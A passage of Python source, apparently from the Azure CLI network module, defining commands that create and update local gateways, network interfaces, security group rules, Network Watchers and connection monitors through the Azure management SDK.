location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
InboundNatRule = cmd.get_models('InboundNatRule')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
upsert_to_collection(ip_config, 'load_balancer_inbound_nat_rules',
InboundNatRule(id=inbound_nat_rule),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_inbound_nat_rule(
cmd, resource_group_name, network_interface_name, ip_config_name, inbound_nat_rule,
load_balancer_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
keep_items = \
[x for x in ip_config.load_balancer_inbound_nat_rules or [] if x.id != inbound_nat_rule]
ip_config.load_balancer_inbound_nat_rules = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
# endregion
# region NetworkSecurityGroups
def create_nsg(cmd, resource_group_name, network_security_group_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).network_security_groups
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
nsg = NetworkSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, network_security_group_name, nsg)
def _create_singular_or_plural_property(kwargs, val, singular_name, plural_name):
if not val:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
kwargs[plural_name] = val
kwargs[singular_name] = None
else:
kwargs[singular_name] = val[0]
kwargs[plural_name] = None
def _handle_asg_property(kwargs, key, asgs):
prefix = key.split('_', 1)[0] + '_'
if asgs:
kwargs[key] = asgs
if kwargs[prefix + 'address_prefix'].is_default:
kwargs[prefix + 'address_prefix'] = ''
def create_nsg_rule_2017_06_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_ranges='*', source_address_prefixes='*',
destination_port_ranges=80, destination_address_prefixes='*',
source_asgs=None, destination_asgs=None):
kwargs = {
'protocol': protocol,
'direction': direction,
'description': description,
'priority': priority,
'access': access,
'name': security_rule_name
}
_create_singular_or_plural_property(kwargs, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_create_singular_or_plural_property(kwargs, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_create_singular_or_plural_property(kwargs, source_port_ranges,
'source_port_range', 'source_port_ranges')
_create_singular_or_plural_property(kwargs, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
kwargs['source_address_prefix'] = kwargs['source_address_prefix'] or ''
kwargs['destination_address_prefix'] = kwargs['destination_address_prefix'] or ''
if cmd.supported_api_version(min_api='2017-09-01'):
_handle_asg_property(kwargs, 'source_application_security_groups', source_asgs)
_handle_asg_property(kwargs, 'destination_application_security_groups', destination_asgs)
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(**kwargs)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def create_nsg_rule_2017_03_01(cmd, resource_group_name, network_security_group_name, security_rule_name,
priority, description=None, protocol=None, access=None, direction=None,
source_port_range='*', source_address_prefix='*',
destination_port_range=80, destination_address_prefix='*'):
SecurityRule = cmd.get_models('SecurityRule')
settings = SecurityRule(protocol=protocol, source_address_prefix=source_address_prefix,
destination_address_prefix=destination_address_prefix, access=access,
direction=direction,
description=description, source_port_range=source_port_range,
destination_port_range=destination_port_range, priority=priority,
name=security_rule_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.security_rules.begin_create_or_update(
resource_group_name, network_security_group_name, security_rule_name, settings)
def _update_singular_or_plural_property(instance, val, singular_name, plural_name):
if val is None:
return
if not isinstance(val, list):
val = [val]
if len(val) > 1:
setattr(instance, plural_name, val)
setattr(instance, singular_name, None)
else:
setattr(instance, plural_name, None)
setattr(instance, singular_name, val[0])
def update_nsg_rule_2017_06_01(instance, protocol=None, source_address_prefixes=None,
destination_address_prefixes=None, access=None, direction=None, description=None,
source_port_ranges=None, destination_port_ranges=None, priority=None,
source_asgs=None, destination_asgs=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.priority = priority if priority is not None else instance.priority
_update_singular_or_plural_property(instance, source_address_prefixes,
'source_address_prefix', 'source_address_prefixes')
_update_singular_or_plural_property(instance, destination_address_prefixes,
'destination_address_prefix', 'destination_address_prefixes')
_update_singular_or_plural_property(instance, source_port_ranges,
'source_port_range', 'source_port_ranges')
_update_singular_or_plural_property(instance, destination_port_ranges,
'destination_port_range', 'destination_port_ranges')
# workaround for issue https://github.com/Azure/azure-rest-api-specs/issues/1591
instance.source_address_prefix = instance.source_address_prefix or ''
instance.destination_address_prefix = instance.destination_address_prefix or ''
if source_asgs == ['']:
instance.source_application_security_groups = None
elif source_asgs:
instance.source_application_security_groups = source_asgs
if destination_asgs == ['']:
instance.destination_application_security_groups = None
elif destination_asgs:
instance.destination_application_security_groups = destination_asgs
return instance
def update_nsg_rule_2017_03_01(instance, protocol=None, source_address_prefix=None,
destination_address_prefix=None, access=None, direction=None, description=None,
source_port_range=None, destination_port_range=None, priority=None):
# No client validation as server side returns pretty good errors
instance.protocol = protocol if protocol is not None else instance.protocol
instance.source_address_prefix = (source_address_prefix if source_address_prefix is not None
else instance.source_address_prefix)
instance.destination_address_prefix = destination_address_prefix \
if destination_address_prefix is not None else instance.destination_address_prefix
instance.access = access if access is not None else instance.access
instance.direction = direction if direction is not None else instance.direction
instance.description = description if description is not None else instance.description
instance.source_port_range = source_port_range \
if source_port_range is not None else instance.source_port_range
instance.destination_port_range = destination_port_range \
if destination_port_range is not None else instance.destination_port_range
instance.priority = priority if priority is not None else instance.priority
return instance
# endregion
# region NetworkProfiles
def list_network_profiles(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).network_profiles
if resource_group_name:
return client.list(resource_group_name)
return client.list_all()
# endregion
# region NetworkWatchers
def _create_network_watchers(cmd, client, resource_group_name, locations, tags):
if resource_group_name is None:
raise CLIError("usage error: '--resource-group' required when enabling new regions")
NetworkWatcher = cmd.get_models('NetworkWatcher')
for location in locations:
client.create_or_update(
resource_group_name, '{}-watcher'.format(location),
NetworkWatcher(location=location, tags=tags))
def _update_network_watchers(cmd, client, watchers, tags):
NetworkWatcher = cmd.get_models('NetworkWatcher')
for watcher in watchers:
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
watcher_tags = watcher.tags if tags is None else tags
client.create_or_update(
watcher_rg, watcher_name,
NetworkWatcher(location=watcher.location, tags=watcher_tags))
def _delete_network_watchers(cmd, client, watchers):
for watcher in watchers:
from azure.cli.core.commands import LongRunningOperation
id_parts = parse_resource_id(watcher.id)
watcher_rg = id_parts['resource_group']
watcher_name = id_parts['name']
logger.warning(
"Disabling Network Watcher for region '%s' by deleting resource '%s'",
watcher.location, watcher.id)
LongRunningOperation(cmd.cli_ctx)(client.begin_delete(watcher_rg, watcher_name))
def configure_network_watcher(cmd, client, locations, resource_group_name=None, enabled=None, tags=None):
watcher_list = list(client.list_all())
locations_list = [location.lower() for location in locations]
existing_watchers = [w for w in watcher_list if w.location in locations_list]
nonenabled_regions = list(set(locations) - set(watcher.location for watcher in existing_watchers))
if enabled is None:
if resource_group_name is not None:
logger.warning(
"Resource group '%s' is only used when enabling new regions and will be ignored.",
resource_group_name)
for location in nonenabled_regions:
logger.warning(
"Region '%s' is not enabled for Network Watcher and will be ignored.", location)
_update_network_watchers(cmd, client, existing_watchers, tags)
elif enabled:
_create_network_watchers(cmd, client, resource_group_name, nonenabled_regions, tags)
_update_network_watchers(cmd, client, existing_watchers, tags)
else:
if tags is not None:
raise CLIError("usage error: '--tags' cannot be used when disabling regions")
_delete_network_watchers(cmd, client, existing_watchers)
return client.list_all()
def create_nw_connection_monitor(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
resource_group_name=None,
location=None,
source_resource=None,
source_port=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=None,
output_type=None,
workspace_ids=None,
notes=None):
v1_required_parameter_set = [
source_resource, source_port,
dest_resource, dest_address, dest_port
]
v2_required_parameter_set = [
endpoint_source_name, endpoint_source_resource_id, endpoint_source_type, endpoint_source_coverage_level,
endpoint_dest_name, endpoint_dest_address, endpoint_dest_type, endpoint_dest_coverage_level,
test_config_name, test_config_protocol,
output_type, workspace_ids,
]
if any(v1_required_parameter_set): # V1 creation
connection_monitor = _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name,
source_port,
location,
dest_resource,
dest_port,
dest_address,
tags,
do_not_start,
monitoring_interval)
from azure.cli.core.profiles._shared import AD_HOC_API_VERSIONS
client = get_mgmt_service_client(
cmd.cli_ctx,
ResourceType.MGMT_NETWORK,
api_version=AD_HOC_API_VERSIONS[ResourceType.MGMT_NETWORK]['nw_connection_monitor']
).connection_monitors
elif any(v2_required_parameter_set): # V2 creation
connection_monitor = _create_nw_connection_monitor_v2(cmd,
location,
tags,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address,
endpoint_source_type,
endpoint_source_coverage_level,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address,
endpoint_dest_type,
endpoint_dest_coverage_level,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_preferred_ip_version,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https,
test_group_name,
test_group_disable,
output_type,
workspace_ids,
notes)
else:
raise CLIError('Unknown operation')
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def _create_nw_connection_monitor_v1(cmd,
connection_monitor_name,
watcher_rg,
watcher_name,
source_resource,
resource_group_name=None,
source_port=None,
location=None,
dest_resource=None,
dest_port=None,
dest_address=None,
tags=None,
do_not_start=None,
monitoring_interval=60):
ConnectionMonitor, ConnectionMonitorSource, ConnectionMonitorDestination = cmd.get_models(
'ConnectionMonitor', 'ConnectionMonitorSource', 'ConnectionMonitorDestination')
cmv1 = ConnectionMonitor(
location=location,
tags=tags,
source=ConnectionMonitorSource(
resource_id=source_resource,
port=source_port
),
destination=ConnectionMonitorDestination(
resource_id=dest_resource,
port=dest_port,
address=dest_address
),
auto_start=not do_not_start,
monitoring_interval_in_seconds=monitoring_interval,
endpoints=None,
test_configurations=None,
test_groups=None,
outputs=None,
notes=None
)
return cmv1
def _create_nw_connection_monitor_v2(cmd,
location=None,
tags=None,
endpoint_source_name=None,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_source_type=None,
endpoint_source_coverage_level=None,
endpoint_dest_name=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
endpoint_dest_type=None,
endpoint_dest_coverage_level=None,
test_config_name=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_port=None,
test_config_tcp_port_behavior=None,
test_config_tcp_disable_trace_route=False,
test_config_icmp_disable_trace_route=False,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None,
test_group_name=None,
test_group_disable=False,
output_type=None,
workspace_ids=None,
notes=None):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_resource_id=endpoint_source_resource_id,
address=endpoint_source_address,
endpoint_type=endpoint_source_type,
coverage_level=endpoint_source_coverage_level)
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_resource_id=endpoint_dest_resource_id,
address=endpoint_dest_address,
endpoint_type=endpoint_dest_type,
coverage_level=endpoint_dest_coverage_level)
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_port_behavior,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
test_group = _create_nw_connection_monitor_v2_test_group(cmd,
test_group_name,
test_group_disable,
[test_config],
[src_endpoint],
[dst_endpoint])
if output_type:
outputs = []
if workspace_ids:
for workspace_id in workspace_ids:
output = _create_nw_connection_monitor_v2_output(cmd, output_type, workspace_id)
outputs.append(output)
else:
outputs = []
ConnectionMonitor = cmd.get_models('ConnectionMonitor')
cmv2 = ConnectionMonitor(location=location,
tags=tags,
auto_start=None,
monitoring_interval_in_seconds=None,
endpoints=[src_endpoint, dst_endpoint],
test_configurations=[test_config],
test_groups=[test_group],
outputs=outputs,
notes=notes)
return cmv2
def _create_nw_connection_monitor_v2_endpoint(cmd,
name,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
endpoint_type=None,
coverage_level=None):
if (filter_type and not filter_items) or (not filter_type and filter_items):
raise CLIError('usage error: '
'--filter-type and --filter-item for endpoint filter must be present at the same time.')
ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter')
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
return endpoint
def _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
test_frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
(ConnectionMonitorTestConfigurationProtocol,
ConnectionMonitorTestConfiguration, ConnectionMonitorSuccessThreshold) = cmd.get_models(
'ConnectionMonitorTestConfigurationProtocol',
'ConnectionMonitorTestConfiguration', 'ConnectionMonitorSuccessThreshold')
test_config = ConnectionMonitorTestConfiguration(name=name,
test_frequency_sec=test_frequency,
protocol=protocol,
preferred_ip_version=preferred_ip_version)
if threshold_failed_percent or threshold_round_trip_time:
threshold = ConnectionMonitorSuccessThreshold(checks_failed_percent=threshold_failed_percent,
round_trip_time_ms=threshold_round_trip_time)
test_config.success_threshold = threshold
if protocol == ConnectionMonitorTestConfigurationProtocol.tcp:
ConnectionMonitorTcpConfiguration = cmd.get_models('ConnectionMonitorTcpConfiguration')
tcp_config = ConnectionMonitorTcpConfiguration(
port=tcp_port,
destination_port_behavior=tcp_port_behavior,
disable_trace_route=tcp_disable_trace_route
)
test_config.tcp_configuration = tcp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.icmp:
ConnectionMonitorIcmpConfiguration = cmd.get_models('ConnectionMonitorIcmpConfiguration')
icmp_config = ConnectionMonitorIcmpConfiguration(disable_trace_route=icmp_disable_trace_route)
test_config.icmp_configuration = icmp_config
elif protocol == ConnectionMonitorTestConfigurationProtocol.http:
ConnectionMonitorHttpConfiguration = cmd.get_models('ConnectionMonitorHttpConfiguration')
http_config = ConnectionMonitorHttpConfiguration(
port=http_port,
method=http_method,
path=http_path,
request_headers=http_request_headers,
valid_status_code_ranges=http_valid_status_codes,
prefer_https=http_prefer_https)
test_config.http_configuration = http_config
else:
raise CLIError('Unsupported protocol: "{}" for test configuration'.format(protocol))
return test_config
def _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
test_configurations,
source_endpoints,
destination_endpoints):
ConnectionMonitorTestGroup = cmd.get_models('ConnectionMonitorTestGroup')
test_group = ConnectionMonitorTestGroup(name=name,
disable=disable,
test_configurations=[tc.name for tc in test_configurations],
sources=[e.name for e in source_endpoints],
destinations=[e.name for e in destination_endpoints])
return test_group
def _create_nw_connection_monitor_v2_output(cmd,
output_type,
workspace_id=None):
ConnectionMonitorOutput, OutputType = cmd.get_models('ConnectionMonitorOutput', 'OutputType')
output = ConnectionMonitorOutput(type=output_type)
if output_type == OutputType.workspace:
ConnectionMonitorWorkspaceSettings = cmd.get_models('ConnectionMonitorWorkspaceSettings')
workspace = ConnectionMonitorWorkspaceSettings(workspace_resource_id=workspace_id)
output.workspace_settings = workspace
else:
raise CLIError('Unsupported output type: "{}"'.format(output_type))
return output
def add_nw_connection_monitor_v2_endpoint(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
coverage_level=None,
endpoint_type=None,
source_test_groups=None,
dest_test_groups=None,
endpoint_resource_id=None,
address=None,
filter_type=None,
filter_items=None,
address_include=None,
address_exclude=None):
(ConnectionMonitorEndpoint, ConnectionMonitorEndpointFilter,
ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
